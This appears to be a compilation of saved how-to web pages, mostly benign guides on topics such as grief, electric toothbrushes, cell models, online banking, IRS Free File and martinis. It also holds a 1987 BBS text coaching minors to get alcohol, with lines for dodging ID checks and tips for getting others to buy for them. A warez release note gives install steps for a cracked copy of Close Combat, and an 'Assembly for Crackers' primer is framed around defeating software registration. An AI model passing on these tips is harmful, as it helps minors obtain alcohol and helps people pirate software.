of the world, this revolution in recognition and acceptance has only started, if at all. While many in

the West can celebrate triumphs, so many women in the developing world can only celebrate

surviving with their children, one more day. What can we do, on this day, to bring meaning to what

has been achieved, and a measure of the distance still to go? Here are some suggestions:

Educate yourself on the progress of the women's movement. Learn what has been

achieved, what still needs to be done, what actions are being taken and where very little is

happening. There are several websites dedicated to this. While in many societies, women already

participate equally with men, there are still many societies where this is not the case. Your job is

not to wallow in the problems, but to find your path to continue the changes.


Participate in activities organized in your locality. Join parades and other activities

organized in your locality even just to cheer the women who try their best to make the

celebration more meaningful. Attend a forum organized around the issues confronting women

today so we understand the issues that women face not only in our own locales, but the

frightening challenges faced daily by a billion women, for whom your life is just a dream.


Have a day of celebration. Organize a party in your office or in your home to celebrate the acts

of courage and determination of women in the past and present, what they have done and

continue to do to achieve equality of status with men. In your church, mosque, synagogue,

ashram or temple, bring the women together to explore how you can reach out to other countries

to give the poorest of women the hope of a chance for their children.


Recognize women's roles in your own life. Look back in your own experience and review the

influence women had in your own life. Thank them for their contribution. If they have caused

some pain, try to stitch up that rip. Recognition brings to consciousness the effect women had on

your own growth and being aware allows you to bring this to the surface so the positive can be

recognized and the pain healed. Talk to your spouse, sister, mother, and grandmother about how

their lives have changed so you get some sense of momentum in the achievements of all women

at least in your society. If you have sons and daughters, include them in the conversation.


Honor the women in your life. There are women in your home and in your office who will

appreciate being noticed on this day. Let them know how much you appreciate them. You can

bring them ALL a flower, treat them to a Women's Day Pauper's Lunch (beans only) at $5 each

(or the equivalent in euros, pounds or rupees) with the money going to a local or international

care agency for women and families. In other words, be creative in ways on how you can get



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How To Deal with grief - OpenTutorial http://www.opentutorial.com/Deal_with_grief

1 4 12/4/2008 7:47

Deal with griefFrom OpenTutorial


1 How to Deal With Grief1.1 What is grief?1.2 How does grief feel?1.3 How long does grief last?1.4 How will I know when I'm done grieving?1.5 How does grief differ from depression?1.6 Where can I find help?

2 Bibliography3 Amazon's Related Products4 See Also5 External Links

How to Deal With Grief

What is grief?

Grief is the normal response of sorrow, emotion, and confusion that comes from losing someone or something important to you. It is a natural part of life. Grief is a typical reaction to death, divorce, job loss, a move away from family and friends, or loss of good health due to illness.

How does grief feel?

Just after a death or loss, you may feel empty and numb, as if you are in shock. You may notice physical changes suchas trembling, nausea, trouble breathing, muscle weakness, dry mouth, or trouble sleeping and eating.

You may become angry - at a situation, a particular person, or just angry in general. Almost everyone in grief also experiences guilt. Guilt is often expressed as "I could have, I should have, and I wish I would have" statements.

People in grief may have strange dreams or nightmares, be absent-minded, withdraw socially, or lack the desire to return to work. While these feelings and behaviors are normal during grief, they will pass.

How long does grief last?

Ads by Google Grief Counseling

Grief and bereavementAnswers to your questions on dealing with grief, loss and more. yourtotalhealth.ivillage.com

Top 10 Cheap FlightsDiscounts On Cheap Plane Tickets Compare Cheap Airfares, Book Now! Deals.FareCompare.com

In Difficult TimesFind a thoughtful gift to show your love and support.www.surprise.com

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How To Choose the Best Electric Toothbrush | How To Do Things.com http://www.howtodothings.com/health-fitness/how-to-choose-the-best-...

1 2 13/4/2008 10:19




By Bronwyn Harris

Difficulty: Cost:

How To Choose the Best Electric Toothbrush

We've all been told by the dental hygienist that electric toothbrushes are far superior to manual

toothbrushes, and many of us have even acted on this advice - after all, if you can avoid fillings and

root canals, why wouldn't you? However, there is a huge range of types of electric toothbrushes in

existence, and it can be difficult to find the right one for you. When choosing the best electric

toothbrush for yourself, it is helpful to keep a few criteria in mind.

Consider the size of the brush head. Electric toothbrushes, just like manual toothbrushes,

have different sizes of brush heads. In general, the smaller the person, the smaller the brush

head needed, although there are obviously exceptions to be made to this rule. People with braces

should also use smaller brush heads. If more than one person is going to use the electric

toothbrush, you may have different brush heads for the same electric toothbrush.


Consider replacement brushes. When buying an electric toothbrush, remember that you will

have to replace the brush heads at about the same frequency that you would replace a manual

toothbrush: every 3-6 months or so. Before you commit to a particular brand and model of

electric toothbrush, make sure that the replacement brushes are available in your area!


Consider the entire cost of the electric toothbrush. Although you are sure to notice the price

of the actual electric toothbrush, don't forget to factor in the cost of brush replacements. If the

particular type of brush replacement is not available in your area, you may have to order it and

pay shipping.


Make sure that you are happy with the charger. Some electric toothbrushes have chargers

that are compact, easy for travel, and take up less space, while others might have larger

chargers or chargers with a place to hold extra brush heads. Some types of electric toothbrush

have an indicator light which shows when the toothbrush needs to be charged.


Think about timers. Many electric toothbrushes have built-in timers, either to measure the two

minutes recommended for brushing all of the teeth, or in 30 second increments for each quadrant

of the mouth.


Consider other options. It is possible to find an electric toothbrush that has different power

settings, for those with sensitive gums. The toothbrushes are available with rotary motion,

ultrasonic action, or a pulsing motion. Many toothbrushes have carrying cases for travel.


Check the warranty. An electric toothbrush, like any device with mechanical and electronic

parts, is prone to possible problems. Make sure your toothbrush has a warranty and that you

keep all of the paperwork.


Electric toothbrushes can be bought in drugstores, mass merchandisers, your dentist's office, and

online. Using these tips, you should be able to find the best electric toothbrush for you!


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[The Guide to good Alcohol] [typed and written by - The Weatherman]

Call these Maryland (301) boards:---------------------------------The Weather Station BBS/AE 3/12bd 24 hrs [301]-661-9355Terminal Obsession BBS/AE 3/12bd 24 hrs [301]-298-0094Razor’s Edge BBS/AE 3/12/24 24 hrs [301]-561-6161

/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\ A Guide to Good Alcohol - The Weatherman /’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\/’\

First I would like to add that I am still under the age of 21, but that never stopped me.. There are many new things out there in the world of drinks, and it is all in different catagories. I will start off with the wine/wine cooler section:

1- Rianite (Red and Strawberry) 2- Seagrams Wine Coolers 3- Bartles and James wine coolers 4- Sun country & California Coolers

Yes, I know there are MANY wines out there, but I only stick to one right now.. Ok, lets move on to the beer section.

1- Molson Golden 2- Michilob 3- St. Pauli Girl 4- Coors 5- Bush 6- Miller 7- Rolling Rock 8- Bud 9- Schaefer 10- Weideman 11- Hiynekin

I am not going to go into the hard-liquer scence yet. There are too many, but the only mixed drinks that are good that I have had are Mellon-Balls, Root Beer Schnaps, Sea-grams 7, and Screwdrivers.

If you have trouble getting it, just try all the liquer stores around your area (city is the best). It can’t hurt to try, and grow a beard or mustache to help you out. If they say ‘No I.D., no drinks’, just use some of te old lines like:

1] I left my I.D. in the car, hold on.2] I can’t find it!3] My licence is suspended, no I.D.4] You served me before, remember?5] I.D. THIS! (and moon them!)

If none of these work, then you can always wait outside of the store and get some cool person to go in and get it for you. Don’t be afraid to ask people, because many will do it, and also you could get someone you know that is legal age to do it, but that takes the fun out of it.. If any new edition come into the scence, I will add them at a later date. Look for more files written by me to come out in the future.

]%- May 25th, 1987 copyright Emdy Pirates association -%[ ]%- The Weatherman -%[


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How to create an art gallery online http://www.koonji.com/showKoonji.htm?koonjiId=902

1 1 13/4/2008 10:24


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Are you an Artist? The Art of Self Promotion

Grants for Artists Create an Art Gallery Online

Why Art?

Stuart - Show your art to the worldStuart on The Saatchi Gallery website allows all art students to showcase their work for thousands of visitors to this site to view.

Saatchi Gallery - Stuart - Report - New York TimesThe brainchild of the London-based advertising magnate and collector Charles Saatchi, thissocial networking outlet — a kind of MySpace knockoff for artists — is causing something of asensation, boosting traffic at the gallery’s Web site overall to more than three million hits aday

Fine Art Galleries : Online Artists ResourcesHuman-edited directory listing thousands of artists, fine art galleries, and museums from around the world. Browse by subject, medium, movement, region and more.

Art Gallery - oil paintings of abstract art, landscape art, moreOur Art Gallery is the best place to buy art online. Oil paintings of abstract art, fantasy art, landscape art, fine nude art, modern art.

How to create an art gallery onlineCreated by: pling | Key contributors:So you're a budding artist. Got that creativity flowing through your veins and lie awake nights dreaming about ideas and concepts. You think you can be a good artist, maybe even a great one. But you don't want to give up your career, grow a beard and start living like an artist. Well, read on, and find out how to set up your own art gallery online, where thousands of people view your materpieces and comment on your amazing concepts. In this article, I tell you what tools and talent you need, how to do it and how to promote yourself as an artist and your art online.

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Create an Art Gallery OnlineHaving taken a long, but necessary, tour onthe way to becoming an online artisticcelebrity, we now arrive at the place to be,for an online artiste. The Stuart galleries fromSaatchi. You could ask me, what's so specialabout Stuart? Aren't there other placesonline where you can display your art, likedeviantART?

Yes there are other places, but the thing thatmakes a stuart gallery special is the kind ofpeople who visit Saatchi in the first place. Ifyou're confused between Saatchi and Stuart,you have a right to be.

Saatchi is a real world gallery in the UK, run by Charles Saatchi. And their website has real art buyers, who can peruse theart online and buy it. They have a reputation and a solid base of buyers. So what Saatchi did was to introduce Stuart as aplace for young and unrecognized online artists to meet and show off their art. This brought together a world of online artlovers, amateur artists and art buyers. Now these art buyers are buying art from Staurt, created by unknown artists, likeyou and me. So go on to Stuart, set up your gallery, and let it rip.


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How To Install Flat Speaker Cable http://howtoinstallflatspeakercable.com/

1 22 20/4/2008 2:18

How To Install Flat Speaker CableHere’s my room. I wanted to connect my surround speakers behind the couch. The stereo is to the left of the TVjust out of the photo.

I had already run wires up to the TV and through to the main right speaker (by the left-most window). But wasn’tsure how best to wire the surrounds.

I did consider going through the walls— cutting up the drywall and/or removing the baseboard and cutting achannel in either the backside of the baseboard or the drywall/studs. But that seemed like too much destruction.

I decided to go with flat speaker cable and run it along my baseboard.

Choosing the Wire

I started at one of the big-box stores, figured I’d patronize the physical store if they had a decent selection andhad samples available.

They had just one kind in the store (I did ask if they had others) and no samples. So I left. The one kind they had was Acoustic Research Microflat cable. Couldn’t figure out what gauge, probably 18. This was a 50 roll for $55.

The big drag with this: the cable is for just 1 speaker. I needed to drive two speakers (left and right surround) andwanted to run both sets of wires along one wall. So first I’d need two of these spools (now we’re up to $110) andI would need to be careful to line up the two cables next to each other or on top of each other along the baseboardso it looked reasonable. Forget it.

Some Googling showed some other promising options. First I searched for Monster Cable. They have a line of SuperFlat wire, but it turns out to not be super flat at all. I found this stuff called Flatwire from DeCorp that looked really nice. Superthin. Cons: still need two runs of cable, plus it requires painting (unless you like the copper look), and doesn’tinclude ready-to-stick adhesive on one side. Both of these last two could be ideal for some installs— if you needto do lots of 90 degree turns, you wouldn’t want paint/adhesive on there. But I didn’t want to deal with adhesiveor painting. Next.

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Build a Solar System http://www.kolias.com/education/solarsystem.htm

1 3 18/4/2008 11:15

How to

Build a Solar System

If you're like many of us, one of your first science projects in school was building a model of the solar system. Well it seems kids today stillare making these homemade projects. We know, because a very nice 13year old recently emailed us wanting to know how to do it. Science can be so much fun.


(All of these materials can be found at a local craft store)

1 big styrofoam ball for the sun (about 8 inches in diameter).9 smaller styrofoam balls ofdifferent sizes to match the planets.10 wooden dowels (read theinstructions below to determine what size).1 box (about 3 x 3 x 3 feet).black thread.pins.clay (a small amount).glue.paint (black for the dowels and box; yellow for the sun & stars; other colors for theplanets).construction paper (red, white, or yellow for rings around planets).1 cork.

1. First, find a good box. It should be big enough inside to hold 9 planets revolving around the sun.

2. Tape the box shut on three sides, leaving one side open. Remove the flaps of the box from the side that is open.

3. Use black paint or construction paper to cover the inside of the box. This will be the universe. Paint small yellow or white stars as abackground for your universe.

4. Get styrofoam balls for the sun and planets. Make sure the sizes are

The Planets Earth & SpaceDid the Universe Come From - God? Interpreting the Latest Results

Wood dowels manufacturerBi h d i d l f B lti R d täb

Home Made Wine Made EasyStep by Step Home Making Guide Simple to Follow Homemade WineWineMakingNow.com

The Clay Hotel: Miami USAWe provide a tranquil environment for relaxation. Visit our site now! www.ClayHotel.com

Uk PCB ManufactureOver 40 years making PCBs Quality through experience. www.minnitron.co.uk

Kaolin ClayFree Technical Search Engine Search Thousands of Catalogs Todaywww.globalspec.com

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Genealogy.com: Finding information at home http://www.genealogy.com/00000027.html

1 1 20/4/2008 2:43

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Finding information at home

Below is a list of household places where you may find genealogical information.You can probably think of a few other places to look, too. Ask your relatives ifthey have or know of any items like these that might be useful to your research.

When you're looking for information at home, you may find items that are dated,but don't have years. For example, Thursday, March 8. This is especially true withdiaries, letters, and clippings found in scrapbooks. You can figure out what theyear is by using a perpetual calendar.

Autograph books Bibles Books (check for inscriptions in them) Certificates (from schools or jobs) Closet doors (look for writing on the inside) Clothing and hats Cookbooks Diaries and day books Family trees Furniture (sometimes you'll find names and dates on the bottoms or backs of furniture) Photo albums Important papers (wills, titles, and deeds) Jewelry (such as pins, ID bracelets, charm bracelets, lockets, or anything else that may have an inscription or indicate membership in an organization) Letters Newspaper clippings Pictures (don't forget to look at the backs) Resum s School papers (report cards can have parents' signatures) Scrapbooks Sewing samplers, quilts, and other handmade items Trunks and chests Yearbooks

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How to Build 3D Models of Animal and Plant Cells - wikiHow http://www.wikihow.com/Build-3D-Models-of-Animal-and-Plant-Cells

1 2 21/4/2008 12:05



How to Build 3D Models of Animal and Plant CellsHow do you build your own 3D model of a plant cell? It's easy to do using just food and simple items from the craft box. Followthe steps carefully to have a successful model that makes learning about cells fantastically easy.

IngredientsjelloPlumsMandarin orangesGrapes (green or red)Pasta (lasagna type pasta is best)Green peas

Have fun

StepsPlace one plastic sack in a small square plastic container. Ensure that the plastic sack completely lines the container.1.

Lay the other plastic sack open on a table. The plastic sacks represent cell membranes, while the plastic containerrepresents a cell wall.


Mix the Jell-O (jelly/gelatin) mixture with warm water.3.

Fill up the plastic bags with the warm Jell-O mix. Put the same amount of Jell-o into the two plastic sacks, so that they arenearly full.


Put the cell organelles into the Jell-o:

1 plum representing the nucleus;

1 small grape for the nucleolus;

2-4 mandarin oranges representing the mitochondria;

2-4 green peas to represent the lysosomes;

2-4 grapes to represent chloroplasts (to be put only in the square plastic container;

some lasagna type pasta to represent the endoplasmic reticulum;

small pieces of cardboard (with the corners rounded off and the flat edge split in half so that looking at it from the top itlooks like a long, skinny oval) to represent the Golgi body;

small buttons form the vacuoles; and

lots of regular table pepper to form the tiny ribosomes.


The plastic sacks should then be closed with a twist tie. Refrigerate the "cell" until it sets, most likely the next day.6.

Label each characteristic of the plant cell.7.

Write up a science report on the project that discusses the different cell parts, what their function is and how you made themodel. You may include photos or drawings if possible if you would like.


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Online Banking http://www.faqs.org/docs/consumer/online-banking.html

1 7 11/4/2008 2:15

Online Banking

Internet RFCs

Usenet FAQs

Other FAQs


Electronic banking, also known as electronic fundtransfer (EFT), uses computer and electronictechnology as a substitute for checks and other paper transactions. EFTs are initiated through devices likecards or codes that let you, or those you authorize,access your account. Many financial institutions useATM or debit cards and Personal IdentificationNumbers (PINs) for this purpose. Some use other forms of debit cards such as those that require, at themost, your signature or a scan. The federal ElectronicFund Transfer Act (EFT Act) covers some electronicconsumer transactions.

Electronic Fund Transfers

EFT offers several services that consumers may findpractical:

Automated Teller Machines or 24-hour Tellersare electronic terminals that let you bank almostany time. To withdraw cash, make deposits, ortransfer funds between accounts, you generally insert an ATM card and enter your PIN. Somefinancial institutions and ATM owners charge afee, particularly to consumers who don't haveaccounts with them or on transactions at remote locations. Generally, ATMs must tell you theycharge a fee and its amount on or at the terminalscreen before you complete the transaction.Check the rules of your institution and ATMs you use to find out when or whether a fee is charged.

Direct Deposit lets you authorize specificdeposits, such as paychecks and Social Securitychecks, to your account on a regular basis. You also may pre-authorize direct withdrawals sothat recurring bills, such as insurance premiums,mortgages, and utility bills, are paidautomatically.

Pay-by-Phone Systems let you call your financialinstitution with instructions to pay certain bills orto transfer funds between accounts. You musthave an agreement with the institution to make such transfers.

Personal Computer Banking lets you handlemany banking transactions via your personal

HSBC Premier BankingExclusive mortgage & savings rates Find out if you qualify online. www.hsbcpremier.com

Bank AccountFind Financial Services Solutions For Your Business. Get It Done Now! www.business.com

PaymentsProcessingThe changing landscape of paymentsDownload a free SEPA whitepaper www.sungard.com/paymen

Credit Cards ProcessingStart Selling Online.Fast, Easy and Secure. Activation Within 72 Hours.www.Gate2Shop.com

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Free File: Step by Step Instructions http://www.irs.gov/efile/article/0,,id=118992,00.html

1 1 19/4/2008 3:54

Free File: Step by Step Instructions

Step 1. How to Get Started: From the "Free File Home – Your link to Free Online Filing"page, click on the " Start Now" button at the bottom of the page. You will go to an IRS.gov Free File page where you may start your search for a Free File company.

Step 2. Determine Your Eligibility: You must first determine your eligibility for using a particular company. Each company has a simple description of their eligibility criteria for using their free service.

Step 3. Link to Free File Company Service: After choosing a company, click on the company's name, which sends you directly to the company's web site (you will be notified you are leaving IRS.gov and being sent to a commercial web site). You may then begin the preparation of your tax return.

You have two options for selecting a Free File company on IRS.gov:

A. Review the complete list of companies and their descriptions of services. Scan the listing of Free File companies on the IRS.gov page after clicking on the "Start Now" button on the Free File Home page. Upon determining eligibility for a free service, you may link directly to the company's web site by clicking on the company's name. Upon doing so, you will be notified that you are leaving the IRS.gov web site and entering the company's web site. You will be located on the company's web site and you may want to start the process of preparing your federal income tax return. You will also find a description of a company's service under "more details" on the IRS.gov free file page.

B. Alternatively, if you are having trouble choosing a company by scanning the list of Free File companies, you may want to use the interactive help tool, "Guide Me To A Company" to narrow down the possible companies offering free preparation and e-filing for you. Click on the button "Guide Me To A Company" to start searching for the companies that may provide free services for you.

If you are uncertain about your answers for the questions contained, you may want to view the complete list of companies and their services. The accuracy of the results is dependent on the accuracy of the information you provide the "Guide Me To A Company" tool.

Step 4. You may exceed eligibility criteria after selecting a company

You may determine after you start preparing your tax return with a particular company you are not eligible for the company's Free File service and you may be subject to a fee.

If this notification occurs you have the following options:

1. Return back to the IRS' Free File homepage and review the list of companies and their services and select another company you may qualify for;

2. Continue completing your return but take note of the fee displayed on the company's website; or

3. Visit the IRS e-file Partners for Taxpayers web page to view additional low-cost e-file opportunities

For example, if you select a company whose free services are provided to individuals with an Adjusted Gross Income (AGI) of $26,000 or less and, based on your tax data, the company determines your AGI exceeds the $26,000 limit, you will be notified you may be subject to a fee. It is important you understand each of the company's eligibility criteria before selecting a company.

Step 5. Prepare and e-file Your Federal Income Tax Return: The company's software prepares and e-files your income tax returns using proprietary processes and systems. Electronically filed returns are transmitted by the company to the IRS using the established e-file system. An acknowledgment file, notifying you that the return has been either accepted or rejected, is sent via email from the company.

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How to do Deconstruction http://www.sou.edu/english/hedges/sodashop/rcenter/theory/howto/de...

1 3 18/4/2008 10:55

Using Deconstruction to Astonish Friends & Confound Enemies (in 2 easy steps)

download a printable version of this information Warren Hedges, Southern Oregon University

1 Identify a Binary Opposition

1.A> Notice what a particular text or school of thought takes to be natural,normal, self-evident, originary, immediately apparent, or worthy of pursuit oremulation:

Group x (whites, middle class, Americans, etc.) is "inherently virtuous"Group x (darker skinned people, youths, etc.) is "natural and spontaneous"Men are naturally x (rational, aggressive, desirous of women, etc.)Women are naturally x (nurturing, connected to the earth, etc.)"Everybody knows that" x is trueEverybody wants x, it is natural to want x, x is an inherent trait of humannature

1.B> Notice those places where a text is most insistent that there is a firm and fast distinction between two things:

Men and women, black and white, straight and gay, subject and objectx precedes y (text: interpretation, Adam: Eve, heterosexuality:homosexuality)x is more natural than y (female: male, heterosexuality: homosexuality)y is derivative of x or a perversion of x (Milton's Satan: Christ, "normal"sex: fetishes, criticism: fiction)y has a parasitic relation to x (fiction: truth, criticism: fiction, interpretation:text)x is original and y is imitative (the book: the movie, life: heaven)y is a manifestation or effect of x (culture: economics, surface: deep structure, gender: anatomy, practice: theory).y is an exception or special case and x is the rule

2 Deconstruct the Opposition

2.A > Show how something represented as primary, complete & originary isderived, composite, and/or an effect of something else.

Because writers always write in relation to prior writers they learn about inschool, fiction is a result of criticism. It depends on criticism, and is derivedfrom criticism.Our sense of Winnie the Pooh when we read books about him is shaped byour memories of the movies. The voices we hear when we read are themovie voices, and the "original" text is partially an effect of the movie.

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┌───────────────────────[ ■ NAPALM PC PRESENTS ■ ]──────────────────────────┐ │ │ │ CLOSE COMBAT FOR WINDOWS ‘95 (c) MICROSOFT │ │ │ ├─────────────────────────────────────┬─────────────────────────────────────┤ │ Supplier: PROPHET │ Release Date: 7/07/96 │ │ Packager: PROPHET │ Game Type : MILITARY SIMULATION │ │ Stripper: PROPHET │ Protection : CD CHECK │ │ Cracker : SHADSEEK │ Disks : 11 │ ├─────────────────────────────────────┴─────────────────────────────────────┤ │ System Requirements: 486/33, 8 MB RAM, 35 MB HD │ └───────────────────────────────────────────────────────────────────────────┘

Release Notes: ~~~~~~~~~~~~~~ In Close Combat everything reacts like it does on the battlefield, from the ripping canvas hiss of the German MG42 machine gun to the screams of the men it hits. It all goes down right in front of you. In real time. So there’s no time to thumb through the manual. You work your mouse like a weapon. Point and click and boom, the shooting starts the second your men step off Omaha Beach and it don’t let up ‘til they’ve taken Saint-Lo. Troops, terrain situations if you want to get any more accurate , you’ll have to shave your head. Wanna go head to head with other military geniuses? All you need is a TCP/IP connection, and guts. So look alive soldier; D-Day happens now!

Thanks to Shadseek for this awesome crack, took some crackers over 3 days to crack but still didn’t crack it but only a few minutes for Shadseek!

CD-Rip Info: ~~~~~~~~~~~~ All animations were removed from the CD. The rest is here.

Installation Notes: ~~~~~~~~~~~~~~~~~~~ Unpack the files using RAR. Then type SETUP.EXE to setup the game. Once done, unzip CCCRK.ZIP to the installed directory. After that ALL Win95 comes with REGEDIT.EXE, so type that then go to: HKEY_LOCAL_MACHINE, then SOFTWARE, then MICROSOFT, then GAMES, then CLOSE COMBAT, then edit Play Videos and change 01 to 00. Finally make a directory in \DATA\VIDEOS\, MAKE SURE THE DIRECTORY \VIDEOS\ IS IN \DATA, or else the game won’t load! This \DATA is located in the directory where you Unpack the zips from, so make the directory there! After all that finally type CC.EXE to start! We apologize for this mess but this is the ONLY way to get this game to work!

Note: Make sure you have DIRECTX installed, which is in the release.


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Improve Your Writing with these Editing Tips - Lifehack.org http://www.lifehack.org/articles/communication/improve-your-writing...

1 12 18/4/2008 3:15


Latest Featured Posts: Following Email Etiquette, Your Individual Development Plan, Are You Lifehacking Too Much?, Working in Project Space, How to Fuel Your Idea Machine. more...

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Improve Your Writing with these Editing Tips

Teachers, business people, and just about everyone else it seems complain often and loudly that people today(usually “kids today”) don’t know how to write. I’m convinced, though, that a big part of the problem (perhapsthe biggest part of the problem) is that people don’t know how to edit. We labor under the notion that goodwriting flows easily from the pen or typing fingers, and that editing too much will “kill” our work.

The best writers know differently, of course — their memoirs and biographies and writing manuals are filled

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ShapingMartini http://maxweber.hunter.cuny.edu/pub/eres/EDSPC715_MCINTYRE/...

1 1 12/4/2008 11:27


Pre-Performance Gathering of Required Ingredients1. One chilled martini glass 2. Beefeater gin - 4oz. 3. Martini & Rossi extra dry vermouth - quarter teaspoon 4. Stainless steel cocktail shaker with strainer 5. Stainless steel spoon or stirrer 6. Measuring cup 7. Measuring spoon 8. Ice (preferably from filtered water) 9. Spanish olive 10.Toothpick *Optional: Bowl of jumbo salted cashews to chew on.

Task Analysis Sequence for "The Perfect Martini"1.Place two martini glasse in the freezer for a minimum of 15 minutes. 2. Place ice cubes into cocktail shaker. 3. Pour four ounces of Beefeater gin in the cocktail shaker. 4. Pour a quarter teaspoon of the vermouth into the cocktail shaker. 5. Stir with stainless steel spoon or stirrer. 6. Remove martini glass from the freezer. 7. Impale one Spanish olive on a toothpick. 8. Place the Spanish olive into the glass 9. Pour the contents of the cocktail shaker through strainer to catch the ice (into glass #1). 10. Repeat steps 2-9 to make a martini for Dr. Mac (and add a touch of Kir for flavoring) 11. Sit back and sip slowly.

Return to the page on Task Analysis

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How to Break a Coconut

Coconuts always look so darn appetizing. Images often pop to mind of sitting on a deserted island with your feet in the sand, drinking a refreshing rum beverage right from a coconut that just fell from a tree. But that image is quickly erased when you soon realize how hard it is to open the darn things.

Inspect the coconut. Usually coconuts will have some dark areas on them. About the size of the dime, there are usually three such areas. These are the weakest points of the coconut. Using that area’s weakness, it’s time to break out the hammer!

Nail the coconut. Literally. Lay out your towel and place the coco-nut on top. Then using your hammer and nail, nail into one of the weak spots on the coconut. Don’t drive the nail all the way. Just enough so that you feel it break through the shell to the hollow middle. Remove the nail.

Drain the coconut. Next place the coconut over a short glass or bowl with the hole side down. Let the coconut drain for 3 minutes or so. If you wish you may drink the coconut milk, or save it, and make drinks with it. (It’s quite tasty with rum!)

Place your coconut back in the towel. Now it’s time to take out some aggression! Once in the towel, take your hammer and strike the coconut forcefully. This may be best done on the ground or on pavement, as you will need to strike it quite hard and you don’t want to ruin your counter top. Continue striking the coconut until you feel it break. You may continue to strike it a few more times until you have broken it into several pieces. This make it easier to grate or remove the “meat” of the coconut.

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A $150 versus a $5,000 Camera http://www.kenrockwell.com/tech/150-vs-5000-dollar-camera.htm

1 6 18/4/2008 11:39

Home Search Gallery How-To Books Links Workshops About Contact

A $150 Camera vs. a $5,000 Camera© 2006 KenRockwell.com

I get my goodies at Ritz, Amazon and Adorama.It helps me publish this site when you get yours from those links, too.

December 2006

INTRODUCTIONJuly 2007: Also see A Comparison Between a $5 Film Camera and a $3,200 Digital Camera.

Skip to: How I Did This Performance Enlargements Recommendations

Here's an example of how a $150 camera can make the same photo as any other exotic camera. Roll yourmouse over the image to swap between the two images.

Which do you think is which? Which has better color? Which has better sharpness? Which has betterhighlight detail? Which has better noise performance?

Roll your mouse over to compare a photo made with a $150 camera to a $5,000 camera.

Sorry about the change in tilt; I used a tripod for the $5,000 camera and hand-held the $150 one. I think thebetter shot actually came from the cheap camera, which is the first image.

Page 196: The Instructional Capital volume I

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Smallest Presentation Hack Ever - Lifehack.org http://www.lifehack.org/articles/communication/smallest-presentation...

1 8 18/4/2008 3:16


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Smallest Presentation Hack EverReady? Here you go:

Don’t. Read. Your. Dumb. Slides.

Long version:

I’m at a pitchfest of an event, and people have come up one after another doing this basic performance over and over again:

“Hello, my name is _____. I’m the CEO and founder of ShinyNewSite.tv. At ShinyNewSite.tv, we believe inmaximizing your efficiency through enhancing your brand and building your… Our mission is…”

What? Hello? Where am I? Oh wait. I think I read a slide that was essentially 300 words on your mission statement, using something like all 300 to try and tell me what you and your marketing team made up.

Communication is about CONNECTION

If you learn NOTHING else from me about communication, presentation, or whatever in hacking your ownlife, building your own value to the world, please learn this: connect. Connect with the people you’re trying tocommunicate with. Build something between us, no matter how short your time is.


Think about who I am. And then build your presentation (conversation, blog, whatever) with me inmind.Acknowledge that you want MY attention. Try hard to keep it by cutting out the fat.Wake me up by saying something in a different way, or say it in a way that sounds like I wrote yourslide for you (meaning we’re on the same wavelength).Don’t skip the foreplay, but don’t bore me.

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confused.fishcake - Ultimate laptop bag mod http://confused.fishcake.googlepages.com/ultimatelaptopbagmod

1 2 19/4/2008 4:05

Ultimate laptop bag mod

OR: How I modded a "TekMod" laptop bag for ultimate laziness and useability

Here are a few pictures of my modded laptop case, along with how I made it. This project all started when I purchased a Tekmodbag, but still was not satisfied with it. Make no mistake, this is a wonderful bag (But don't talk to me about import duty from it - damn UK customs), but with a bluetooth dongle, ipod and usb-connected phone I want to leave plugged in, the grab-and-go functionality is impaired somewhat, with the aforementioned parts needing to be stowed away every journey.

There is a sizeable compartment on the back of the bag, easily enough for my ipod, bluetooth dongle and phone, and so I decided to add an internal usb port to the compartment. The trouble is, most usb cables have a long "stalk" coming out of the back of them, meaning that when I fold up the case, either the cable or (even worse) usb port of my laptop will break. In the end, I took out my trusty dremel-clone, and made a flush, 90 degree usb plug:

This was the hardest part of the project, as even good epoxy struggles to stick to the tinny metal used in usb plugs. I still have not gotten around to insulating the plug, but I know myself well enough to know I never will.

Onwards then, to where the real fun starts. By unpicking a hole in the side of the bag, I fed the usb cable into the compartment, then soldered it to a spare usb hub which has been hacked and burned more times than I care to mention:

Chapter 1 http://mysite.wanadoo-members.co.uk/supervillain/page1.html

1 3 22/4/2008 4:11

Chapter 1

Chapter 1

Chapter 2 part A

Chapter 2 part B

Chapter 3

Chapters 4 and 5

Chapter 6

Super hero trash!

Chapter 1 - Henchmen

Your first task is to assemble an entourage of brainless thugs. Thugs will be a major part of your plans, as you don't want to be tackling any heroes first off. You will need some excessive drawn-out violence to soften them up first. Wave after wave of expendable, drivelling idiots are obviously critical to this. Finding buffoons of a low enough calibre is always a problem, but if you follow the tried and tested checklist below, you can't go wrong.

Things to remember when picking your henchmen:


First you will need to give them an IQ test. If they score any higher than 60, ditch them. If your henchmen have a mental capacity greater than a squirrel, they may realise that the odds are stacked against them when faced with a man who has just killed 30 other henchmen with his bare hands, and turn on you.

Moral status

It is vitally important that your thugs have no moral status whatsoever. Test this by running over a small furry animal in front of them. If they react, they're out. If faced with a tough dilemma, these thugs may have the audacity to help the under-dog or save the kid. This is clearly unacceptable.


It's important to make sure that your henchmen are castrated as soon as they are initiated. If they fall for the girl, you'll be in a whole heap of trouble. If they don't have to think about sex, their mind will be on violence, 100%. Because they have had their testicles removed, their testosterone levels will drop. Inject them regularly to avoid disappointment.

Love of mindless violence with no regard for personal safety

Henchmen need to be able to react to any situation. With violence. This is good for two reasons:

1. Thugs should always resort to killing the person who is mucking about with your plans.2. In a heated melee, you should be able to escape un-scathed, leaving your henchmen to fight on regardless. If they are obsessed with their own safety, they'll be running too, leaving nobody to distract your attacker.

Lack of imagination

If your henchmen have imagination, they may try to think for

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Assembly for Crackers - v1.0----------------------------

Hey, This is a very basic guide to assembly for all those people who couldn’t be bothered learning the in’s & out’s of their computer just to be able to use mIRC without having to click on some guys face. :)

I’ll basically go through the most necessary stuff that you need to know before you can begin to crack. I know it’s not in a very logical order, but what d’ya want for free? ;))

Oh yeah, you should view this with wordwrap on, otherwise it’ll be a pain in the arse to follow ;)


Registers are basically default places in which to store data. The only ones we need to worry about are: (E)AX,(E)BX,(E)CX,(E)DX( The (E) is only significant when debugging 32-bit code )

Also the register pairs:DS:SI ; Can be used as the source for string operationsES:DI ; Used as the target for string operations

To understand registers isn’t very important for cracking, generally just to know that they’re variables for data storage is enough to get you started :)

Page 199: The Instructional Capital volume I

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Assembly for Crackers - v1.0----------------------------

